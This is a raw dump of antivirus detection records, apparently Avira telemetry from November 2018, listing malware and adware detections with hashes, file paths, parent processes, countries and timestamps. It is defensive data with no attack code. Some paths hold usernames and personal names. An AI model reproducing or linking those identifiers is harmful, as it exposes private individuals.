  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\AppData\\Roaming\\.minecraft\\versions\\1.8.8\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='ab3f7ac8daf2d7af65fbbf61020a84cef933e64802d2a280a68b59a59645adf6', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe', parentsize=2552312, timestamp='2018-11-02T21:34:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rthdcpl.exe', filepath='C:\\Program Files\\Realtek\\InstallShield\\RTHDCPL.exe', filesize=16128000, name='TR/Patched.Gen.#M300.#R2947'), hash='ab648793e83e05a712df2df6abce4747ebb5df986d0be72275408f337c2c8f57', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:xICg5KwPxUah2aTX.1', country='LB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=126264, timestamp='2018-11-02T07:22:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='windowsformsapp2.exe', filepath='C:\\comandsoft\\WindowsFormsApp2\\WindowsFormsApp2\\obj\\Release\\WindowsFormsApp2.exe', filesize=1152000, name='HEUR/AGEN.1003473.#M1.#R1'), hash='ab714e78737ba53201a68a9f9ded01d000461639d6734181706052fdf5eba21a', metadata=Row(cmdline='@\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\tmpf3a29e56e2c54723893adada0bfddf58.rsp\\\\\\"', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.6.1 Tools\\al.exe', parentsize=229512, timestamp='2018-11-02T05:44:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064500-f5a73e5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e98bdcaa\\AVSCAN-20181102-064437-F1CC38C1\\AVSCAN-20181102-064500-F5A73E5E', filesize=1152000, name='HEUR/AGEN.1003473.#M1.#R1'), hash='ab714e78737ba53201a68a9f9ded01d000461639d6734181706052fdf5eba21a', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:45:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='abc0979552785a44816e8327eb68c6f212117cf546d6619688e764e1fe8dd91a.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\ABC0979552785A44816E8327EB68C6F212117CF546D6619688E764E1FE8DD91A.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='abc0979552785a44816e8327eb68c6f212117cf546d6619688e764e1fe8dd91a', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:45:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='solidconverterpdf.exe', filepath='\\\\nas-2tb\\共用資料夾\\1.暫存業務區\\5.黃佳音\\舊資料\\9.吳伊環\\巫data\\資訊軟體\\solid converter pdf 7.3 build 1541\\solidconverterpdf.exe', filesize=2432000, name='W32/Stanit.#M1.#R1'), hash='abcd4f7fab8ff279901524929cf1e894964ed761eae6322e766d195c700cbb21', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:C1hRPhq5PE2zUF3r.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=114408, timestamp='2018-11-02T05:24:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='solidconverterpdf.exe', filepath='\\\\nas-2tb\\共用資料夾\\1.暫存業務區\\5.黃佳音\\舊資料\\9.吳伊環\\巫data\\資訊軟體\\solid converter pdf 7.3 build 1541\\solidconverterpdf.exe', filesize=2432000, name='W32/Stanit.#M1.#R1'), hash='abcd4f7fab8ff279901524929cf1e894964ed761eae6322e766d195c700cbb21', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:C1hRPhq5PE2zUF3r.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=114408, timestamp='2018-11-02T05:24:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsr18AA.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=8455960, timestamp='2018-11-02T07:41:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsg1871.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-02T10:17:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsz83F0.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-02T07:32:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsz83F0.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-02T11:31:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsb9E0.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/SkipUac', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\IObit\\Advanced SystemCare\\ASC.exe', parentsize=8370448, timestamp='2018-11-02T15:05:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsz83F0.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-02T02:13:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsr18AA.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=8455960, timestamp='2018-11-02T11:41:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230639-38cbe1c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_51ec643d\\AVSCAN-20181102-230559-35822134\\AVSCAN-20181102-230639-38CBE1C2', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:06:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsqFF0D.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:16:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsg1871.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-02T11:32:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230642-39071cee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_51ec643d\\AVSCAN-20181102-230559-35822134\\AVSCAN-20181102-230642-39071CEE', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:06:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230649-399c59fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_51ec643d\\AVSCAN-20181102-230559-35822134\\AVSCAN-20181102-230649-399C59FD', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:06:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230646-395b1944', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_51ec643d\\AVSCAN-20181102-230559-35822134\\AVSCAN-20181102-230646-395B1944', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:06:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230623-377e15b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_51ec643d\\AVSCAN-20181102-230559-35822134\\AVSCAN-20181102-230623-377E15B7', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:06:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsg4541.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:49:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsu5BF5.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:24:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsr18AA.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/uac', country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=8455960, timestamp='2018-11-02T18:30:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsw7C67.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:49:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsr18AA.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=8455960, timestamp='2018-11-02T15:41:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsg1871.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-02T09:45:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsg1871.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-02T09:00:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsw7C67.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:49:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsz83F0.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-02T21:38:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cycclient.exe', filepath='D:\\掃瞄資料\\804\\CycClient.exe', filesize=12800000, name='W32/Alman.BB.#M1.#R1'), hash='abf5101cde7d9a1c21fe01498a6e987af6a9078c46767e354e99ef3ce98ff7fd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cycclient.exe', filepath='D:\\掃瞄資料\\804\\CycClient.exe', filesize=12800000, name='W32/Alman.BB.#M1.#R1'), hash='abf5101cde7d9a1c21fe01498a6e987af6a9078c46767e354e99ef3ce98ff7fd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:13:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmpe42iu7q1', filepath='/tmp/tmpe42iu7q1', filesize=512000, name='PUA/BitcoinMiner.#M1.#R1'), hash='ac03da9c91f2cfb3adb873d286d9bc97f7b38463ea8d32a196f408b72e5f681d', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T08:24:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ac6a629e9d80f98f7dc9ae3801e534000f996f8668aef8132394a91772c88e0b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ac9a9e65d85f6e46e657d5af7e87712fe6e0b35d6791f8c158e28b40b64104b9', filepath='/home/sneubert/Downloads/ac9a9e65d85f6e46e657d5af7e87712fe6e0b35d6791f8c158e28b40b64104b9', filesize=704000, name='TR/ATRAPS.Gen.#M2.#R699'), hash='ac9a9e65d85f6e46e657d5af7e87712fe6e0b35d6791f8c158e28b40b64104b9', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='Ubuntu 18', os_vminor='04', parentproc=None, parentsize=None, timestamp='2018-11-02T12:08:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ac9a9e65d85f6e46e657d5af7e87712fe6e0b35d6791f8c158e28b40b64104b9', filepath='/home/sneubert/Downloads/ac9a9e65d85f6e46e657d5af7e87712fe6e0b35d6791f8c158e28b40b64104b9', filesize=704000, name='TR/ATRAPS.Gen.#M2.#R699'), hash='ac9a9e65d85f6e46e657d5af7e87712fe6e0b35d6791f8c158e28b40b64104b9', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='Ubuntu 18', os_vminor='04', parentproc=None, parentsize=None, timestamp='2018-11-02T12:07:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000cefb', filepath='C:\\Windows\\Temp\\d273b1d6-74d4-409f-b71c-f02a76aadc41\\tmp000004c4\\tmp0000cefb', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='ad0aef261c1af41c7bfa67c73e5b7d6613b55d8a1a21a8430796a72a3514ff2b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.2.889.11556\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T11:10:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ae1f6258f850536252fdabf95a804982e15b79664aed7475a2693fb567c13072', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-19\\AE1F6258F850536252FDABF95A804982E15B79664AED7475A2693FB567C13072', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ae1f6258f850536252fdabf95a804982e15b79664aed7475a2693fb567c13072', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054132-f2a36c20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9b17bb50\\AVSCAN-20181102-054012-E6DB4F4B\\AVSCAN-20181102-054132-F2A36C20', filesize=1024000, name='HEUR/AGEN.1011385.#M1.#R1'), hash='ae40fa4808ef667cfef3e30d183a01ac1babbf001e8ea76fb14ec098c7f613be', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='daemon-tools-lite-1040-serial-key-only.exe', filepath='I:\\Downloads\\DAEMON-Tools-Lite-1040-Serial-Key-Only.exe', filesize=1024000, name='HEUR/AGEN.1011385.#M1.#R1'), hash='ae40fa4808ef667cfef3e30d183a01ac1babbf001e8ea76fb14ec098c7f613be', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4675384, timestamp='2018-11-02T04:39:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ae6c89ba33fb3fb7c0ecffcde0ffdc3501b4fe3d405f1d1fef94c6c9b4aa7627', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T13:30:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ae6c89ba33fb3fb7c0ecffcde0ffdc3501b4fe3d405f1d1fef94c6c9b4aa7627', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T14:41:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ae8e4b96b5522890593bbb379a0a66f0e8e5005d2f7fb40e900a20a0fba7d81a', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T02:44:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ae8e4b96b5522890593bbb379a0a66f0e8e5005d2f7fb40e900a20a0fba7d81a', metadata=Row(cmdline='\\\\\\/Embedding', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T03:06:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ae8e4b96b5522890593bbb379a0a66f0e8e5005d2f7fb40e900a20a0fba7d81a', metadata=Row(cmdline='\\\\\\/Embedding', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T06:52:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ae8e4b96b5522890593bbb379a0a66f0e8e5005d2f7fb40e900a20a0fba7d81a', metadata=Row(cmdline='\\\\\\/Embedding', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T07:25:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ytdsetup.exe', filepath='E:\\Hannes\\YTDSetup.exe', filesize=10304000, name='Adware/Adware.543562.#M1.#R1'), hash='aeaaa560e95d54a6ed2392d59898f295f6e9368bc9b8c1d8f537b79f4c3dc798', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T08:57:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110223-bdde6436', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28b44806\\AVSCAN-20181102-105950-ADF1FC32\\AVSCAN-20181102-110223-BDDE6436', filesize=10304000, name='Adware/Adware.543562.#M1.#R1'), hash='aeaaa560e95d54a6ed2392d59898f295f6e9368bc9b8c1d8f537b79f4c3dc798', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:02:25Z'), dt=datetime.date(2018, 11, 2)),
  ...],
 [Row(detection=Row(filename='mhx-xs.exe', filepath='h:\\العاب\\الفراخ 3\\MHX-XS.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='ac3ad7f61f6dc403b5f27868d83c18089121ab71f92f18e1144cbba694fce2c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:43:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0010834.exe', filepath='h:\\system volume information\\_restore{d91319e2-a444-4f72-ae88-de668da52f71}\\rp2\\A0010834.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='ac3ad7f61f6dc403b5f27868d83c18089121ab71f92f18e1144cbba694fce2c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:37:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0010866.exe', filepath='h:\\system volume information\\_restore{d91319e2-a444-4f72-ae88-de668da52f71}\\rp2\\A0010866.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='ac3ad7f61f6dc403b5f27868d83c18089121ab71f92f18e1144cbba694fce2c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:38:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0011104.exe', filepath='h:\\system volume information\\_restore{d91319e2-a444-4f72-ae88-de668da52f71}\\rp2\\A0011104.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='ac3ad7f61f6dc403b5f27868d83c18089121ab71f92f18e1144cbba694fce2c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:40:12Z'), dt=datetime.date(2018, 11, 4)),
